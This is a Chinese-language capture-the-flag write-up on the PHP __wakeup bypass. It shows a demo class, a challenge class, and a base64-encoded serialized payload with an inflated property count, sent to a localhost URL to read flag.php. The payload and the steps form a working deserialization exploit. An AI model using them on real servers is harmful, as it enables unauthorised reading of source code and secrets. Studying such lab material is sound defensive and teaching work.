漏洞介绍

当序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行

演示代码：<?phphighlight_file(__FILE__);class test{var $bull;public function __destruct(){$this->bull = "destruct
";echo $this->bull;echo "destruct ok!
";}public function __wakeup(){$this->bull = "wake up
";echo $this->bull;echo "wake up ok!
";}}// 正常payload// $payload = O:4:"test":1:{s:4:"bull";s:4:"sdfz";}// 触发漏洞的payload$payload = 'O:4:"test":2:{s:4:"bull";s:4:"sdfz";}';$abc = unserialize($payload);?>

题目

<?phpclass SoFun{protected $file='index.php';public function __construct($file){$this->file = $file;}function __destruct(){if(!empty($this->file)){//查找file文件中的字符串，如果有'\'和'/'在字符串中，就显示错误if(strchr($this->file,"\")===false && strchr($this->file, '/')===false){show_source(dirname (__FILE__).'/'.$this ->file);}else{die('Wrong filename.');}}}function __wakeup(){$this-> file='index.php';}public function __toString(){return '';}}if (!isset($_GET['file'])){show_source('index.php');}else{$file=base64_decode( $_GET['file']);echo unserialize($file);}?>

解题：

1. 获得反序列化对象

<?phpclass SoFun{protected $file='index.php';public function __construct($file){$this->file = $file;}function __destruct(){if(!empty($this->file)){//查找file文件中的字符串，如果有'\'和'/'在字符串中，就显示错误if(strchr($this->file,"\")===false && strchr($this->file, '/')===false){show_source(dirname (__FILE__).'/'.$this ->file);}else{die('Wrong filename.');}}}function __wakeup(){$this-> file='index.php';}public function __toString(){return '';}}if (!isset($_GET['file'])){//show_source('index.php');}else{$file=base64_decode( $_GET['file']);echo unserialize($file);}$test = new SoFun('flag.php');echo base64_encode(serialize($test));结果：Tzo1OiJTb0Z1biI6MTp7czo3OiIAKgBmaWxlIjtzOjg6ImZsYWcucGhwIjt9?>

2、利用漏洞

# 把变量数量更改为大于实际的变量数量并重新用base64编码Tzo1OiJTb0Z1biI6Mjp7czo3OiIAKgBmaWxlIjtzOjg6ImZsYWcucGhwIjt9

3、访问URL

 http://127.0.0.1/test.php?file=Tzo1OiJTb0Z1biI6Mjp7czo3OiIAKgBmaWxlIjtzOjg6ImZsYWcucGhwIjt9